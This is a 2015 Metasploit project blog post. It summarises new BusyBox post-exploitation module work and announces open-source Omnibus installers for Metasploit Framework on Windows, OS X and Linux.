Posted by egypt Employee Oct 7, 2015

Welcome to another edition of the increasingly inaccurately named Weekly Wrap up! I'm egypt and I'll be your host. Since the last one of these, a lot of work has landed on the Framework. I talked about some of it with a bit of a yearly wrapup at my Derbycon talk. We also had a fun time at the Metasploit Townhall.


One of the recent things I didn't cover is the super cool BusyBox work by Javier Vicente Vallejo. For those who aren't familiar, BusyBox is a small, usually statically compiled, shell environment for resource-constrained systems like SOHO routers (which we've talked about quite a bit here on the Metasploit blog). From the official website:

BusyBox combines tiny versions of many common UNIX utilities into a single small executable. It provides replacements for most of the utilities you usually find in GNU fileutils, shellutils, etc. The utilities in BusyBox generally have fewer options than their full-featured GNU cousins; however, the options that are included provide the expected functionality and behave very much like their GNU counterparts. BusyBox provides a fairly complete environment for any small or embedded system.


BusyBox has been written with size-optimization and limited resources in mind. It is also extremely modular so you can easily include or exclude commands (or features) at compile time. This makes it easy to customize your embedded systems. To create a working system, just add some device nodes in /dev, a few configuration files in /etc, and a Linux kernel.

BusyBox is used all over the place with all sorts of different configurations and, as a result of its modular design, many deployments are stripped down to the bare minimum requirements of a given system. That means significant environment-specific limitations from a post-exploitation perspective. Having a collection of tools for working with it after you've compromised a device can save a lot of time over figuring out what particular handicaps a given busybox has been compiled with.


We also released our shiny new Omnibus installer, with support for Windows, Linux, and OS X, for your Open Source installation pleasure.


As always, feel free to check the diffs from the last blog checkpoint, over on GitHub.


Exploit modules


Auxiliary and post modules

Rapid7 has long supplied universal Metasploit installers for Linux and Windows. These installers contain both the open source Metasploit Framework and the commercial extensions, which include a graphical user interface, metamodules, wizards, social engineering tools and integration with other Rapid7 tools. While these features are very useful, we recognized that they are not for everyone. According to our recent survey of Metasploit Community users, most only used it for the open source components, preferring the command-line tools over the graphical ones. Also, while we do our best to ensure that Metasploit Community and Pro releases are of high quality, they are not always supplied with the latest hot new exploits and payloads available in Metasploit Framework.

While it has always been possible to simply set up a development environment and run the latest metasploit-framework code from GitHub directly, it can still be tricky to set up and keep up to date. Kali Linux 2.0 now publishes the open source pieces of Metasploit Framework with its distribution, but the release schedule still follows that of the Metasploit Community / Pro editions, and it of course does not necessarily help those who prefer other operating systems.

To address the needs of open source enthusiasts, those needing more frequent updates, or those simply looking for an easy way to set up a database for Metasploit Framework development use, we have created Open Source installers for Metasploit Framework for Windows, OS X and Linux on x86 and x86-64 platforms. These installers use the Omnibus tool from Chef to package everything needed to run Metasploit Framework, from dependent libraries and a specific Ruby version to a built-in PostgreSQL database. The installers are easy to install and get up and running in seconds. They are also built and tested automatically each night, so you can always run 'msfupdate' and get the latest exploits and payloads without having to set up a development environment. The installers also integrate with your OS's native package manager, be it RPM or DEB on Linux, MSI on Windows or PKG on OS X. That makes them easy to uninstall as well.

For information about how to install and use these new packages, see the wiki page of the Metasploit Framework project on GitHub. The installers themselves are also open source, so if you see a problem, pull requests or issue reports are very welcome! Note that in addition to these Metasploit-specific installers, there are other ways to get Metasploit Framework, such as through Dave Kennedy's PenTester Framework or even pre-installed in Kali Linux. The Metasploit Framework Omnibus installers provide another way to get the open source Metasploit Framework running on a variety of platforms quickly and easily.
